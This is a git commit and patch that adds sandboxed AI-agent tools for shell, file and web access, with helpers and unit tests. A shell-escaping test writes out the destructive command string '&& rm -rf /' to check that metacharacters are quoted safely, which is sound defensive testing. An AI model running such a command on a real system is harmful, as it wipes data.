the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) --------- Co-authored-by: Claude Opus 4.7 (1M context) --- lib/agent/__tests__/buildAgentTools.test.ts | 34 +++- lib/agent/buildAgentTools.ts | 29 ++- lib/agent/tools/__tests__/bashTool.test.ts | 14 +- .../tools/__tests__/editFileTool.test.ts | 86 +++++++++ lib/agent/tools/__tests__/globTool.test.ts | 97 ++++++++++ lib/agent/tools/__tests__/grepTool.test.ts | 103 +++++++++++ .../tools/__tests__/readFileTool.test.ts | 89 ++++++++++ lib/agent/tools/__tests__/shellEscape.test.ts | 20 +++ .../tools/__tests__/toDisplayPath.test.ts | 29 +++ .../tools/__tests__/todoWriteTool.test.ts | 28 +++ .../tools/__tests__/webFetchTool.test.ts | 96 ++++++++++ .../tools/__tests__/writeFileTool.test.ts | 52 ++++++ lib/agent/tools/bashTool.ts | 109 ++++++------ lib/agent/tools/editFileTool.ts | 100 +++++++++++ lib/agent/tools/globTool.ts | 165 ++++++++++++++++++ lib/agent/tools/grepTool.ts | 143 +++++++++++++++ lib/agent/tools/readFileTool.ts | 70 ++++++++ lib/agent/tools/shellEscape.ts | 14 ++ lib/agent/tools/toDisplayPath.ts | 34 ++++ lib/agent/tools/todoWriteTool.ts | 65 +++++++ lib/agent/tools/webFetchTool.ts | 124 +++++++++++++ lib/agent/tools/writeFileTool.ts | 65 +++++++ 22 files changed, 1491 insertions(+), 75 deletions(-) create mode 100644 lib/agent/tools/__tests__/editFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/globTool.test.ts create mode 100644 lib/agent/tools/__tests__/grepTool.test.ts create mode 100644 lib/agent/tools/__tests__/readFileTool.test.ts create mode 100644 lib/agent/tools/__tests__/shellEscape.test.ts create mode 100644 lib/agent/tools/__tests__/toDisplayPath.test.ts create mode 100644 lib/agent/tools/__tests__/todoWriteTool.test.ts create mode 100644 lib/agent/tools/__tests__/webFetchTool.test.ts create mode 100644 lib/agent/tools/__tests__/writeFileTool.test.ts create mode 100644 lib/agent/tools/editFileTool.ts create mode 100644 lib/agent/tools/globTool.ts create mode 100644 lib/agent/tools/grepTool.ts create mode 100644 lib/agent/tools/readFileTool.ts create mode 100644 lib/agent/tools/shellEscape.ts create mode 100644 lib/agent/tools/toDisplayPath.ts create mode 100644 lib/agent/tools/todoWriteTool.ts create mode 100644 lib/agent/tools/webFetchTool.ts create mode 100644 lib/agent/tools/writeFileTool.ts diff --git a/lib/agent/__tests__/buildAgentTools.test.ts b/lib/agent/__tests__/buildAgentTools.test.ts index 52479cad0..5478c59ca 100644 --- a/lib/agent/__tests__/buildAgentTools.test.ts +++ b/lib/agent/__tests__/buildAgentTools.test.ts @@ -1,17 +1,35 @@ import { describe, it, expect } from "vitest"; import { buildAgentTools } from "@/lib/agent/buildAgentTools"; +const EXPECTED_TOOL_NAMES = [ + "bash", + "read", + "write", + "edit", + "grep", + "glob", + "todo_write", + "web_fetch", +] as const; + describe("buildAgentTools", () => { - it("returns a tools record keyed by tool name", () => { + it("returns a tools record with all 8 leaf tools registered", () => { const tools = buildAgentTools(); - expect(tools).toHaveProperty("bash"); - expect(typeof tools.bash).toBe("object"); + for (const name of EXPECTED_TOOL_NAMES) { + expect(tools).toHaveProperty(name); + } }); - it("each tool has an inputSchema, description, and execute", () => { - const tools = buildAgentTools(); - expect(tools.bash.inputSchema).toBeDefined(); - expect(tools.bash.description).toBeDefined(); - expect(typeof tools.bash.execute).toBe("function"); + it("each tool exposes the AI SDK shape (description + inputSchema + execute)", () => { + const tools = buildAgentTools() as Record< + string, + { description?: unknown; inputSchema?: unknown; execute?: unknown } + >; + for (const name of EXPECTED_TOOL_NAMES) { + const t = tools[name]!; + expect(typeof t.description).toBe("string"); + expect(t.inputSchema).toBeDefined(); + expect(typeof t.execute).toBe("function"); + } }); }); diff --git a/lib/agent/buildAgentTools.ts b/lib/agent/buildAgentTools.ts index be6bde085..f9cbc2b39 100644 --- a/lib/agent/buildAgentTools.ts +++ b/lib/agent/buildAgentTools.ts @@ -1,4 +1,11 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; /** * Factory for the full agent tool set passed into `streamText({ tools })`. @@ -6,14 +13,26 @@ import { bashTool } from "@/lib/agent/tools/bashTool"; * at execute time — the factory takes no arguments because the tools are * stateless modulo that context. * - * Slim PR 4 exposes only `bash`. The remaining sandbox tools (`read`, - * `write`, `grep`, `glob`, `todo`, `task`, `ask_user_question`, `skill`, - * `fetch`) port in follow-up PRs and slot into this record one-by-one - * without changing the factory signature. + * Currently ships 8 leaf tools: + * - bash, read, write, edit, grep, glob (sandbox / file ops) + * - todo_write (planning surface; stateless, echoes the list back) + * - web_fetch (HTTP via curl inside the sandbox) + * + * Composite tools (`task` subagent, `ask_user_question` UI part, + * `skill` skill discovery) port in a follow-up PR — they require + * subagent context plumbing / UI rendering / skill discovery infra + * that isn't in api today. */ export function buildAgentTools() { return { - bash: bashTool(), + bash: bashTool, + read: readFileTool, + write: writeFileTool, + edit: editFileTool, + grep: grepTool, + glob: globTool, + todo_write: todoWriteTool, + web_fetch: webFetchTool, }; } diff --git a/lib/agent/tools/__tests__/bashTool.test.ts b/lib/agent/tools/__tests__/bashTool.test.ts index da9a999d3..568a7f72d 100644 --- a/lib/agent/tools/__tests__/bashTool.test.ts +++ b/lib/agent/tools/__tests__/bashTool.test.ts @@ -34,7 +34,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = await tool.execute!({ command: "ls" }, { experimental_context: baseContext, } as never); @@ -64,7 +64,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "find ." }, { experimental_context: baseContext, } as never)) as { truncated?: boolean }; @@ -83,7 +83,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "ls", cwd: "apps/web" }, { experimental_context: baseContext, } as never); @@ -107,7 +107,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "curl example.com" }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); @@ -121,7 +121,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stdout: string }; @@ -134,7 +134,7 @@ describe("bashTool.execute", () => { const sandbox = makeSandbox({ execDetached: undefined }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; const result = (await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: baseContext, } as never)) as { success: boolean; stderr: string }; @@ -148,7 +148,7 @@ describe("bashTool.execute", () => { }); vi.mocked(connectVercel).mockResolvedValue(sandbox as never); - const tool = bashTool(); + const tool = bashTool; await tool.execute!({ command: "npm run dev", detached: true }, { experimental_context: { ...baseContext, recoupOrgId: "org-uuid" }, } as never); diff --git a/lib/agent/tools/__tests__/editFileTool.test.ts b/lib/agent/tools/__tests__/editFileTool.test.ts new file mode 100644 index 000000000..3a2cac81d --- /dev/null +++ b/lib/agent/tools/__tests__/editFileTool.test.ts @@ -0,0 +1,86 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { editFileTool } from "@/lib/agent/tools/editFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(initialContent: string) { + let stored = initialContent; + return { + workingDirectory: "/sandbox/mono", + readFile: vi.fn(async () => stored), + writeFile: vi.fn(async (_path: string, content: string) => { + stored = content; + }), + getStored: () => stored, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("editFileTool", () => { + it("replaces a unique oldString once and reports the startLine", async () => { + const sb = makeSandbox("line one\nold value\nline three"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "old value", newString: "new value" }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number; startLine: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(1); + expect(result.startLine).toBe(2); + expect(sb.getStored()).toBe("line one\nnew value\nline three"); + }); + + it("rejects when oldString === newString (no-op)", async () => { + const sb = makeSandbox("anything"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "x", newString: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/must be different/); + }); + + it("rejects when oldString is not in the file", async () => { + const sb = makeSandbox("hello world"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "missing", newString: "other" }, + { experimental_context: ctx } as never, + )) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); + + it("rejects ambiguous edits (multiple matches without replaceAll)", async () => { + const sb = makeSandbox("foo\nfoo\nbar"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!({ filePath: "a.txt", oldString: "foo", newString: "baz" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/2 times/); + }); + + it("replaces all occurrences when replaceAll:true", async () => { + const sb = makeSandbox("foo bar foo baz foo"); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = editFileTool; + const result = (await tool.execute!( + { filePath: "a.txt", oldString: "foo", newString: "qux", replaceAll: true }, + { experimental_context: ctx } as never, + )) as { success: boolean; replacements: number }; + expect(result.success).toBe(true); + expect(result.replacements).toBe(3); + expect(sb.getStored()).toBe("qux bar qux baz qux"); + }); +}); diff --git a/lib/agent/tools/__tests__/globTool.test.ts b/lib/agent/tools/__tests__/globTool.test.ts new file mode 100644 index 000000000..3f35d0a71 --- /dev/null +++ b/lib/agent/tools/__tests__/globTool.test.ts @@ -0,0 +1,97 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { globTool } from "@/lib/agent/tools/globTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("globTool", () => { + it("parses `mtime\\tsize\\tpath` output into structured file entries", async () => { + // Two files, newest first (sort already happens server-side in the command). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "1700000000.0\t512\t/sandbox/mono/src/index.ts\n1699999000.5\t256\t/sandbox/mono/src/util.ts", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + count: number; + files: Array<{ path: string; size: number; modifiedAt: string }>; + }; + expect(result.success).toBe(true); + expect(result.count).toBe(2); + expect(result.files[0]?.path).toBe("src/index.ts"); + expect(result.files[0]?.size).toBe(512); + expect(typeof result.files[0]?.modifiedAt).toBe("string"); // ISO + }); + + it("emits a recursive find (no -maxdepth) for `**/*.ts`", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "**/*.ts" }, { experimental_context: ctx } as never); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).not.toContain("-maxdepth"); + }); + + it("emits -maxdepth 1 for a bare `*.json` pattern (no recursion)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + await tool.execute!({ pattern: "*.json" }, { experimental_context: ctx } as never); + expect(sb.exec.mock.calls[0]?.[0]).toMatch(/-maxdepth\s+1/); + }); + + it("returns success:false on non-1 exit codes", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "err", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = globTool; + const result = (await tool.execute!({ pattern: "**/*.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/exit 2/); + }); +}); diff --git a/lib/agent/tools/__tests__/grepTool.test.ts b/lib/agent/tools/__tests__/grepTool.test.ts new file mode 100644 index 000000000..e3545f501 --- /dev/null +++ b/lib/agent/tools/__tests__/grepTool.test.ts @@ -0,0 +1,103 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { grepTool } from "@/lib/agent/tools/grepTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("grepTool", () => { + it("parses `file:line:content` output into structured matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: + "/sandbox/mono/src/a.ts:5:export function login() {\n/sandbox/mono/src/a.ts:42: login();\n/sandbox/mono/src/b.ts:7:login()", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "login", path: "src" }, { + experimental_context: ctx, + } as never)) as { + success: boolean; + matches: Array<{ file: string; line: number; content: string }>; + filesWithMatches: number; + }; + expect(result.success).toBe(true); + expect(result.matches).toHaveLength(3); + expect(result.matches[0]).toEqual({ + file: "src/a.ts", + line: 5, + content: "export function login() {", + }); + expect(result.filesWithMatches).toBe(2); + }); + + it("treats exit code 1 (no matches) as success:true with empty matches", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 1, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "nothing", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; matchCount: number }; + expect(result.success).toBe(true); + expect(result.matchCount).toBe(0); + }); + + it("returns success:false for real grep errors (non-1 exit)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 2, + stdout: "", + stderr: "grep: invalid regex", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + const result = (await tool.execute!({ pattern: "[", path: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/invalid regex/); + }); + + it("passes -i for caseSensitive:false", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = grepTool; + await tool.execute!({ pattern: "x", path: ".", caseSensitive: false }, { + experimental_context: ctx, + } as never); + expect(sb.exec.mock.calls[0]?.[0]).toContain(" -i "); + }); +}); diff --git a/lib/agent/tools/__tests__/readFileTool.test.ts b/lib/agent/tools/__tests__/readFileTool.test.ts new file mode 100644 index 000000000..6d1d27fa3 --- /dev/null +++ b/lib/agent/tools/__tests__/readFileTool.test.ts @@ -0,0 +1,89 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { readFileTool } from "@/lib/agent/tools/readFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { + sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, +}; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + stat: vi.fn(), + readFile: vi.fn(), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("readFileTool", () => { + it("reads a file and returns numbered lines", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 10, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("line one\nline two\nline three"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "README.md" }, { + experimental_context: ctx, + } as never)) as { success: boolean; content: string; totalLines: number; path: string }; + expect(result.success).toBe(true); + expect(result.totalLines).toBe(3); + expect(result.content).toBe("1: line one\n2: line two\n3: line three"); + expect(result.path).toBe("README.md"); + }); + + it("honors offset + limit (1-indexed)", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => false, isFile: () => true, size: 0, mtimeMs: 0 }), + readFile: vi.fn().mockResolvedValue("a\nb\nc\nd\ne"), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "x.txt", offset: 2, limit: 2 }, { + experimental_context: ctx, + } as never)) as { content: string; startLine: number; endLine: number }; + expect(result.startLine).toBe(2); + // `endLine` is the last line included (1-indexed). With offset=2,limit=2 + // we read lines 2 + 3 of a 5-line file, so endLine=3. + expect(result.endLine).toBe(3); + expect(result.content).toBe("2: b\n3: c"); + }); + + it("rejects directories", async () => { + const sb = makeSandbox({ + stat: vi + .fn() + .mockResolvedValue({ isDirectory: () => true, isFile: () => false, size: 0, mtimeMs: 0 }), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "src" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/directory/i); + }); + + it("returns success:false with an error string on stat/readFile failure", async () => { + const sb = makeSandbox({ + stat: vi.fn().mockRejectedValue(new Error("not found")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = readFileTool; + const result = (await tool.execute!({ filePath: "missing.ts" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/not found/); + }); +}); diff --git a/lib/agent/tools/__tests__/shellEscape.test.ts b/lib/agent/tools/__tests__/shellEscape.test.ts new file mode 100644 index 000000000..699605129 --- /dev/null +++ b/lib/agent/tools/__tests__/shellEscape.test.ts @@ -0,0 +1,20 @@ +import { describe, it, expect } from "vitest"; +import { shellEscape } from "@/lib/agent/tools/shellEscape"; + +describe("shellEscape", () => { + it("wraps a plain string in single quotes", () => { + expect(shellEscape("hello")).toBe("'hello'"); + }); + + it("escapes embedded single quotes via the standard ' → '\\'' dance", () => { + expect(shellEscape("it's")).toBe("'it'\\''s'"); + }); + + it("handles strings with shell metacharacters unchanged inside single quotes", () => { + expect(shellEscape("$VAR `cmd` && rm -rf /")).toBe("'$VAR `cmd` && rm -rf /'"); + }); + + it("returns just '' for the empty string", () => { + expect(shellEscape("")).toBe("''"); + }); +}); diff --git a/lib/agent/tools/__tests__/toDisplayPath.test.ts b/lib/agent/tools/__tests__/toDisplayPath.test.ts new file mode 100644 index 000000000..e862f7276 --- /dev/null +++ b/lib/agent/tools/__tests__/toDisplayPath.test.ts @@ -0,0 +1,29 @@ +import { describe, it, expect } from "vitest"; +import { toDisplayPath } from "@/lib/agent/tools/toDisplayPath"; + +const WORKDIR = "/sandbox/mono"; + +describe("toDisplayPath", () => { + it("strips the workingDirectory prefix when the file is inside", () => { + expect(toDisplayPath("/sandbox/mono/src/index.ts", WORKDIR)).toBe("src/index.ts"); + }); + + it("returns `.` for the workingDirectory itself", () => { + expect(toDisplayPath("/sandbox/mono", WORKDIR)).toBe("."); + }); + + it("keeps an absolute path when it's outside the working directory", () => { + expect(toDisplayPath("/etc/hosts", WORKDIR)).toBe("/etc/hosts"); + }); + + it("resolves a relative input against the working directory", () => { + expect(toDisplayPath("apps/web/page.tsx", WORKDIR)).toBe("apps/web/page.tsx"); + }); + + it("normalizes back-slashes to forward slashes (Windows-style absolute input)", () => { + // path.resolve on POSIX leaves backslashes inside the segment; the + // helper should still emit forward slashes for paths it keeps absolute. + const result = toDisplayPath("/tmp/win\\path", WORKDIR); + expect(result.includes("\\")).toBe(false); + }); +}); diff --git a/lib/agent/tools/__tests__/todoWriteTool.test.ts b/lib/agent/tools/__tests__/todoWriteTool.test.ts new file mode 100644 index 000000000..7b5d88c9e --- /dev/null +++ b/lib/agent/tools/__tests__/todoWriteTool.test.ts @@ -0,0 +1,28 @@ +import { describe, it, expect } from "vitest"; +import { todoWriteTool } from "@/lib/agent/tools/todoWriteTool"; + +describe("todoWriteTool", () => { + it("echoes the todos back with a count message", async () => { + const todos = [ + { id: "1", content: "ls the workspace", status: "in_progress" as const }, + { id: "2", content: "summarize what we found", status: "pending" as const }, + ]; + const result = (await todoWriteTool.execute!({ todos }, {} as never)) as { + success: boolean; + message: string; + todos: typeof todos; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 2 items"); + expect(result.todos).toEqual(todos); + }); + + it("accepts an empty list", async () => { + const result = (await todoWriteTool.execute!({ todos: [] }, {} as never)) as { + success: boolean; + message: string; + }; + expect(result.success).toBe(true); + expect(result.message).toBe("Updated task list with 0 items"); + }); +}); diff --git a/lib/agent/tools/__tests__/webFetchTool.test.ts b/lib/agent/tools/__tests__/webFetchTool.test.ts new file mode 100644 index 000000000..47fb75c92 --- /dev/null +++ b/lib/agent/tools/__tests__/webFetchTool.test.ts @@ -0,0 +1,96 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { webFetchTool } from "@/lib/agent/tools/webFetchTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(exec: ReturnType) { + return { workingDirectory: "/sandbox/mono", exec }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("webFetchTool", () => { + it("parses body + trailing status code on success", async () => { + // Body, then newline, then status code "200" (per the curl -w '%{http_code}' contract). + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: '{"ok":true}\n200', + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/api" }, { + experimental_context: ctx, + } as never)) as { success: boolean; status: number; body: string; truncated: boolean }; + expect(result).toEqual({ + success: true, + status: 200, + body: '{"ok":true}', + truncated: false, + }); + }); + + it("marks truncated:true on curl exit 23 (head -c cut off the body)", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 23, + stdout: "huge body fragment\n200", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/huge" }, { + experimental_context: ctx, + } as never)) as { success: boolean; truncated: boolean }; + expect(result.success).toBe(true); + expect(result.truncated).toBe(true); + }); + + it("returns success:false on non-0, non-23 curl exit", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: false, + exitCode: 7, + stdout: "", + stderr: "Failed to connect", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const result = (await webFetchTool.execute!({ url: "https://example.com/unreachable" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/Failed to connect/); + }); + + it("passes the request body for POST", async () => { + const sb = makeSandbox( + vi.fn().mockResolvedValue({ + success: true, + exitCode: 0, + stdout: "ok\n201", + stderr: "", + truncated: false, + }), + ); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + await webFetchTool.execute!( + { url: "https://example.com/api", method: "POST", body: '{"x":1}' }, + { experimental_context: ctx } as never, + ); + const cmd = sb.exec.mock.calls[0]?.[0] as string; + expect(cmd).toContain("-X POST"); + expect(cmd).toContain("-d '{\"x\":1}'"); + }); +}); diff --git a/lib/agent/tools/__tests__/writeFileTool.test.ts b/lib/agent/tools/__tests__/writeFileTool.test.ts new file mode 100644 index 000000000..3656a777c --- /dev/null +++ b/lib/agent/tools/__tests__/writeFileTool.test.ts @@ -0,0 +1,52 @@ +import { describe, it, expect, vi, beforeEach } from "vitest"; +import { writeFileTool } from "@/lib/agent/tools/writeFileTool"; +import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; + +vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ + connectVercel: vi.fn(), +})); + +const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" } }; + +function makeSandbox(over: Record = {}) { + return { + workingDirectory: "/sandbox/mono", + mkdir: vi.fn().mockResolvedValue(undefined), + writeFile: vi.fn().mockResolvedValue(undefined), + stat: vi + .fn() + .mockResolvedValue({ size: 42, mtimeMs: 0, isDirectory: () => false, isFile: () => true }), + ...over, + }; +} + +beforeEach(() => vi.clearAllMocks()); + +describe("writeFileTool", () => { + it("creates parent dirs and writes content via sandbox.writeFile", async () => { + const sb = makeSandbox(); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "src/index.ts", content: "export {}" }, { + experimental_context: ctx, + } as never)) as { success: boolean; path: string; bytesWritten: number }; + expect(result.success).toBe(true); + expect(result.path).toBe("src/index.ts"); + expect(result.bytesWritten).toBe(42); + expect(sb.mkdir).toHaveBeenCalledWith("/sandbox/mono/src", { recursive: true }); + expect(sb.writeFile).toHaveBeenCalledWith("/sandbox/mono/src/index.ts", "export {}", "utf-8"); + }); + + it("returns success:false on sandbox failure", async () => { + const sb = makeSandbox({ + writeFile: vi.fn().mockRejectedValue(new Error("EACCES")), + }); + vi.mocked(connectVercel).mockResolvedValue(sb as never); + const tool = writeFileTool; + const result = (await tool.execute!({ filePath: "a.ts", content: "x" }, { + experimental_context: ctx, + } as never)) as { success: boolean; error: string }; + expect(result.success).toBe(false); + expect(result.error).toMatch(/EACCES/); + }); +}); diff --git a/lib/agent/tools/bashTool.ts b/lib/agent/tools/bashTool.ts index 908113812..479a608db 100644 --- a/lib/agent/tools/bashTool.ts +++ b/lib/agent/tools/bashTool.ts @@ -21,9 +21,9 @@ const bashInputSchema = z.object({ }); /** - * Factory for the `bash` sandbox tool. Runs `bash -c ""` inside - * the agent's sandbox via `sandbox.exec`, defaulting cwd to the sandbox's - * working directory. + * `bash` sandbox tool. Runs `bash -c ""` inside the agent's + * sandbox via `sandbox.exec`, defaulting cwd to the sandbox's working + * directory. * * Approval gating is intentionally absent — model-issued commands are * trusted in this PR. Add a host-side gate at the route/UI layer if that @@ -34,9 +34,8 @@ const bashInputSchema = z.object({ * the right org. Detached execs deliberately skip env injection — those * processes outlive the prompt. */ -export const bashTool = () => - tool({ - description: `Execute a bash command in the user's shell (non-interactive). +export const bashTool = tool({ + description: `Execute a bash command in the user's shell (non-interactive). WHEN TO USE: - Running existing 